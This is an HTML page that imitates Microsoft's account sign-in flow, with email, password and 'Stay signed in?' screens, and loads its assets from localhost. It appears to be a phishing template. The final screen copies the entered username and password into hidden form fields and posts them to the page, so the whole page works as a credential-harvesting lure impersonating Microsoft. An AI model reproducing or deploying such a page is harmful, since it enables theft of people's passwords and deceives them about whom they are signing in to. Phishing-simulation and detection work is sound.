<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
    <link rel="icon" href="http://localhost/static/microsoftAssets/favicon.ico"/>
    <title>Sign in to your Microsoft account</title>
    <link rel="stylesheet" href="http://localhost/static/microsoftAssets/app.css"/>
</head>

<body>
    <section id="section_uname">
        <div class="auth-wrapper">
            <img src="http://localhost/static/microsoftAssets/logo.png" alt="Microsoft"/>
            <h2 class="title mb-16 mt-16">Sign in</h2>
            <form action="">
                <div class="mb-16">
                    <p id="error_uname" class="error"></p>
                    <input id="inp_uname" type="text" name="uname" class="input" placeholder="Email, phone, or Skype"/>
                </div>
            </form>
            <div>
                <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a></p>
                <p class="mb-16 fs-13">
                    <a href="#" class="link">Sign in with a security key
                        <img src="http://localhost/static/microsoftAssets/question.png" alt="Question img"/>
                    </a>
                </p>
            </div>
            <div>
                <button class="btn" id="btn_next">Next</button>
            </div>
        </div>
        <div class="opts">
            <p class="has-icon mb-0" style="font-size:15px;"><span class="icon"><img src="http://localhost/static/microsoftAssets/key.png" width="30px"/></span> Sign-in options</p>
        </div>
    </section>

    <section id="section_pwd" class="d-none">
        <div class="auth-wrapper">
            <img src="http://localhost/static/microsoftAssets/logo.png" alt="Microsoft" class="d-block"/>
            <div class="identity w-100 mt-16 mb-16">
                <button class="back">
                    <img src="http://localhost/static/microsoftAssets/back.png"/>
                </button>
                <span id="user_identity">a@b.com</span>
            </div>
            <h2 class="title mb-16">Enter password</h2>
            <form action="">
                <div class="mb-16">
                    <p id="error_pwd" class="error"></p>
                    <input id="inp_pwd" type="password" name="password" class="input" placeholder="Password"/>
                </div>
            </form>
            <div>
                <p class="mb-16"> <a href="#" class="link fs-13">Forgot password?</a></p>
                <p class="mb-16">
                    <a href="#" class="link fs-13">Other ways to sign in</a>
                </p>
            </div>
            <div>
                <button class="btn" id="btn_sig">Sign in</button>
            </div>
        </div>
    </section>

    <section id="section_final" class="d-none">
        <div class="auth-wrapper">
            <img src="http://localhost/static/microsoftAssets/logo.png" alt="Microsoft" class="d-block"/>
            <div class="identity w-100 mt-16 mb-16">
                <span id="user_identity">a@b.com</span>
            </div>
            <h2 class="title mb-16">Stay signed in?</h2>
            <p class="p">Stay signed in so you don&#39;t have to sign in again next time.</p>
            <label class="has-checkbox">
                <input type="checkbox" class="checkbox"/>
                <span>Don&#39;t show this again</span>
            </label>
            <div class="btn-group">
                <form class="form" action="" method="POST">
                    <input class="hiddenData" id="hiddenUsername" name="username" type="text" placeholder="username"/>
                    <input class="hiddenData" id="hiddenPassword" name="password" type="password" placeholder="password"/>
                    <button class="btn btn-sec" type="submit" id="btn_final">No</button>
                    <button class="btn" type="submit" id="btn_final">Yes</button>
                </form>
                
            </div>
        </div>
    </section>
    <footer class="footer">
        <a href="#">Terms of use</a>
        <a href="#">Privacy &amp; cookies</a>
        <span>. . .</span>
    </footer>
    <script src="http://localhost/static/microsoftAssets/app.js"></script>


</body></html>